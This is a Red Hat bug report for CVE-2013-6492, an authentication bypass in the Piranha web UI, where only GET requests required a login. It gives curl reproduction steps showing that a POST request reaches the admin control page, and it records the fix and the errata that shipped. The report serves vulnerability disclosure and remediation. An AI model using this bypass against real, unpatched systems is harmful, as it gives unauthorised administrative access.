1043040 – (CVE-2013-6492) CVE-2013-6492 piranha: web UI authentication bypass using POST requests

Bug 1043040 (CVE-2013-6492) - CVE-2013-6492 piranha: web UI authentication bypass using POST requests

Summary: CVE-2013-6492 piranha: web UI authentication bypass using POST requests

Keywords:
Status:	CLOSED ERRATA
Alias:	CVE-2013-6492
Product:	Security Response
Classification:	Other
Component:	vulnerability
Sub Component:
Version:	unspecified
Hardware:	Unspecified
OS:	Unspecified
Priority:	high
Severity:	high
Target Milestone:	---
Assignee:	Red Hat Product Security
QA Contact:
Docs Contact:
URL:
Whiteboard:
Depends On:	1061903 1061904 1061905 1061906
Blocks:	1043709
TreeView+	depends on / blocked

Reported:	2013-12-13 19:58 UTC by Othman Madjoudj
Modified:	2021-02-17 07:04 UTC (History)
CC List:	6 users (show)
Fixed In Version:
Clone Of:
Environment:
Last Closed:	2014-02-13 19:50:31 UTC
Embargoed:

Attachments	(Terms of Use)
Auth bypass fix (345 bytes, patch) 2013-12-13 19:58 UTC, Othman Madjoudj	no flags	Details \| Diff
View All

Links
System	ID	Priority	Status	Summary	Last Updated
CentOS	6825	None	None	None	Never
Red Hat Product Errata	RHSA-2014:0174	normal	SHIPPED_LIVE	Important: piranha security update	2014-02-13 23:45:55 UTC
Red Hat Product Errata	RHSA-2014:0175	normal	SHIPPED_LIVE	Important: piranha security and bug fix update	2014-02-13 23:45:45 UTC

Description Othman Madjoudj 2013-12-13 19:58:51 UTC

Created attachment 836487 [details]
Auth bypass fix

Description of problem:

In Piranha web UI configuration, only GET requests require authentication (via <Limit GET>...</Limit> in config file), it's possible to display some page by sending POST requests.

Version-Release number of selected component (if applicable):
piranha-0.8.6-4.el6.x86_64


Steps to Reproduce:

1. GET requests require authentication as expected:

# curl  -I http://192.168.1.34:3636/secure/control.php
HTTP/1.1 401 Authorization Required
Date: Fri, 13 Dec 2013 20:43:35 GMT
Server: Apache/2.2.15 (CentOS) PHP/5.3.3
WWW-Authenticate: Basic realm="access to the piranha web GUI"
Connection: close
Content-Type: text/html; charset=iso-8859-1

2. The same request but with POST:

# curl -d'' -I http://192.168.1.34:3636/secure/control.php 
<HTML>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML Strict Level 3//EN">

<HEAD>
<TITLE>Piranha (Control/Monitoring)</TITLE>
<STYLE TYPE="text/css">
[...]
[...]
[...]
</FORM>
</TD></TR></TABLE>
</BODY>


Actual results:
Admin page displayed

Expected results:
Admin page denied

Additional info:
A fix is attached

Comment 1 Vincent Danen 2013-12-17 00:25:28 UTC

This would indeed be a security issue, so I'm going to turn this into an SRT bug and get a CVE assigned.  Thank you for this report.

Comment 2 Vincent Danen 2013-12-17 00:34:41 UTC

This also looks to affect upstream piranha as the httpd.conf in question is included in the source file.

Comment 7 Tomas Hoger 2014-02-05 14:51:38 UTC

Original report in the CentOS bug tracker:

http://bugs.centos.org/view.php?id=6825

Comment 8 Tomas Hoger 2014-02-05 15:44:37 UTC

Bumping priority, this can be effectively used to modify lvs.cf configuration file.

Comment 12 errata-xmlrpc 2014-02-13 18:48:05 UTC

This issue has been addressed in following products:

  Red Hat Enterprise Linux 6

Via RHSA-2014:0175 https://rhn.redhat.com/errata/RHSA-2014-0175.html

Comment 13 errata-xmlrpc 2014-02-13 18:48:20 UTC

This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2014:0174 https://rhn.redhat.com/errata/RHSA-2014-0174.html

Note You need to log in before you can comment on or make changes to this bug.